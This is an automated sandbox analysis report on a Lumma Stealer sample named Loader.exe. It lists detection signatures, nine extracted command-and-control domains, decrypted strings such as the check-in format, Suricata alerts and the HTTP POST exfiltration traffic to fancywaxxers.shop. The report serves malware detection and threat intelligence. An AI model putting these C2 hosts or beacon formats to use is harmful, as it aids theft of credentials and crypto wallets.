Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1582872
MD5:932410f2b859e916c9c7a8b801348466
SHA1:f59ac63b492dbc16a7eedd3d18efc59acf21a6a7
SHA256:17e94a7a504d2b8ab36914f0b5d2bebd9a2acd21533cfba1ca410c6594498272
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Loader.exe (PID: 4980 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 932410F2B859E916C9C7A8B801348466)
    • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Loader.exe (PID: 6472 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 932410F2B859E916C9C7A8B801348466)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["noisycuttej.shop", "tirepublicerj.shop", "cloudewahsj.shop", "rabidcowse.shop", "wholersorie.shop", "abruptyopsn.shop", "fancywaxxers.shop", "framekgirus.shop", "nearycrepso.shop"], "Build id": "yau6Na--5809224103"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000003.2338745992.0000000002D36000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.2352050415.0000000002D36000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.2375611870.0000000002D36000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000003.2375179400.0000000002D36000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000003.00000003.2390068678.0000000002D36000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 5 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:38:09.546494+010020283713Unknown Traffic192.168.2.549704104.21.80.1443TCP
                2024-12-31T17:38:38.303746+010020283713Unknown Traffic192.168.2.549781104.21.80.1443TCP
                2024-12-31T17:38:39.548056+010020283713Unknown Traffic192.168.2.549792104.21.80.1443TCP
                2024-12-31T17:38:41.043154+010020283713Unknown Traffic192.168.2.549800104.21.80.1443TCP
                2024-12-31T17:38:43.396652+010020283713Unknown Traffic192.168.2.549815104.21.80.1443TCP
                2024-12-31T17:38:45.340382+010020283713Unknown Traffic192.168.2.549827104.21.80.1443TCP
                2024-12-31T17:38:47.321564+010020283713Unknown Traffic192.168.2.549842104.21.80.1443TCP
                2024-12-31T17:38:49.423943+010020283713Unknown Traffic192.168.2.549858104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:38:37.817926+010020546531A Network Trojan was detected192.168.2.549704104.21.80.1443TCP
                2024-12-31T17:38:38.773454+010020546531A Network Trojan was detected192.168.2.549781104.21.80.1443TCP
                2024-12-31T17:38:49.900923+010020546531A Network Trojan was detected192.168.2.549858104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:38:37.817926+010020498361A Network Trojan was detected192.168.2.549704104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:38:38.773454+010020498121A Network Trojan was detected192.168.2.549781104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:38:09.546494+010020586571Domain Observed Used for C2 Detected192.168.2.549704104.21.80.1443TCP
                2024-12-31T17:38:38.303746+010020586571Domain Observed Used for C2 Detected192.168.2.549781104.21.80.1443TCP
                2024-12-31T17:38:39.548056+010020586571Domain Observed Used for C2 Detected192.168.2.549792104.21.80.1443TCP
                2024-12-31T17:38:41.043154+010020586571Domain Observed Used for C2 Detected192.168.2.549800104.21.80.1443TCP
                2024-12-31T17:38:43.396652+010020586571Domain Observed Used for C2 Detected192.168.2.549815104.21.80.1443TCP
                2024-12-31T17:38:45.340382+010020586571Domain Observed Used for C2 Detected192.168.2.549827104.21.80.1443TCP
                2024-12-31T17:38:47.321564+010020586571Domain Observed Used for C2 Detected192.168.2.549842104.21.80.1443TCP
                2024-12-31T17:38:49.423943+010020586571Domain Observed Used for C2 Detected192.168.2.549858104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:38:09.045715+010020586561Domain Observed Used for C2 Detected192.168.2.5651731.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:38:40.377926+010020480941Malware Command and Control Activity Detected192.168.2.549792104.21.80.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://fancywaxxers.shop:443/apiMicrosoftAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/api$Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/apiSdAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/apiNhAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/kquAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/api_yUAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/api1-2Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/apiMECnAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop:443/api.Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/slAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/api-Avira URL Cloud: Label: malware
                Source: 00000000.00000002.2038611351.0000000002C0D000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "tirepublicerj.shop", "cloudewahsj.shop", "rabidcowse.shop", "wholersorie.shop", "abruptyopsn.shop", "fancywaxxers.shop", "framekgirus.shop", "nearycrepso.shop"], "Build id": "yau6Na--5809224103"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.6% probability
                Source: Loader.exeJoe Sandbox ML: detected
                Source: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                Source: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                Source: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                Source: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                Source: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: framekgirus.shop
                Source: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wholersorie.shop
                Source: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                Source: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                Source: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fancywaxxers.shop
                Source: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: yau6Na--5809224103
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00414A9A CryptUnprotectData,3_2_00414A9A
                Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49781 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49792 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49800 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49815 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49827 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49842 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49858 version: TLS 1.2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0033B6A8 FindFirstFileExW,0_2_0033B6A8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0033B759 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0033B759
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0033B6A8 FindFirstFileExW,3_2_0033B6A8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0033B759 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_0033B759
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+7A9041FFh]3_2_0042207D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+000000A0h]3_2_0042207D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [edi+eax], 0000h3_2_00420830
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edx], al3_2_0042DA21
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax]3_2_0043F23F
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_0042D2FF
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00414A9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000002B4h]3_2_00414A9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov esi, eax3_2_00414A9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_00439B30
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then add ecx, edx3_2_00439B30
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [edi+eax+09h], 00000000h3_2_00439B30
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, di3_2_00426B80
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [edi], cx3_2_0040CEC7
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-12h]3_2_00440ED0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+0Eh]3_2_00441F50
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_0040D75B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [edx]3_2_0040D75B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+00000128h]3_2_0040D75B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+70DF14B1h]3_2_0040D75B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+486C2613h]3_2_0040D75B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then call 00440630h3_2_0043CFDB
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]3_2_00427050
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov esi, ecx3_2_00427050
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_00427050
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]3_2_00427879
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_00427030
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edx], al3_2_0041B8D4
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, eax3_2_00405910
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, eax3_2_00405910
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+0F72769Fh]3_2_00416914
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+00000130h]3_2_00416914
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+eax*8], 7DA30DA1h3_2_00416914
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00420130
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042B1E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00421980
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+08h]3_2_0043D9A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042AA70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_004162D2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov dword ptr [esp+000000A4h], 00000000h3_2_004162D2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then push edi3_2_0043EAF2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041AA81
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_0041AA81
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00436320
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_0042BBCB
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042CC46
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_00407470
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_0042BC0F
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_0042BB79
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edi, ecx3_2_0041CD40
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00428D4A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax3_2_00413D50
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, 00000001h3_2_00413D50
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx-38328F31h]3_2_0043D560
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_0042AD70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00423D10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00423D10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp al, 5Ch3_2_00402530
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_00429DF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00423D10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00423D10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax3_2_0040BDB9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00423E62
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042CE63
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then test eax, eax3_2_0043A660
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 385488F2h3_2_0043A660
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx3_2_00416E62
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-7FCF7E90h]3_2_00421600
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042C63D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, eax3_2_0043F6E3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [ebx], ax3_2_004096B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+1Ah]3_2_004096B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]3_2_00402F10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx-17h]3_2_00408FE0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B0h]3_2_00417FBC

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.5:65173 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49704 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49781 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49792 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49800 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49815 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49827 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49842 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49858 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49792 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49858 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49781 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49781 -> 104.21.80.1:443
                Source: Malware configuration extractorURLs: noisycuttej.shop
                Source: Malware configuration extractorURLs: tirepublicerj.shop
                Source: Malware configuration extractorURLs: cloudewahsj.shop
                Source: Malware configuration extractorURLs: rabidcowse.shop
                Source: Malware configuration extractorURLs: wholersorie.shop
                Source: Malware configuration extractorURLs: abruptyopsn.shop
                Source: Malware configuration extractorURLs: fancywaxxers.shop
                Source: Malware configuration extractorURLs: framekgirus.shop
                Source: Malware configuration extractorURLs: nearycrepso.shop
                Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49781 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49792 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49800 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49815 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49827 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49842 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49858 -> 104.21.80.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U5BOA8BVM9R9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12804Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DESGX3OQDDC0V3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15058Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OH8EJ5QTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20512Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TMY17K7WUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1204Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0MBIVEZHVYB9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570460Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: fancywaxxers.shop
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: fancywaxxers.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
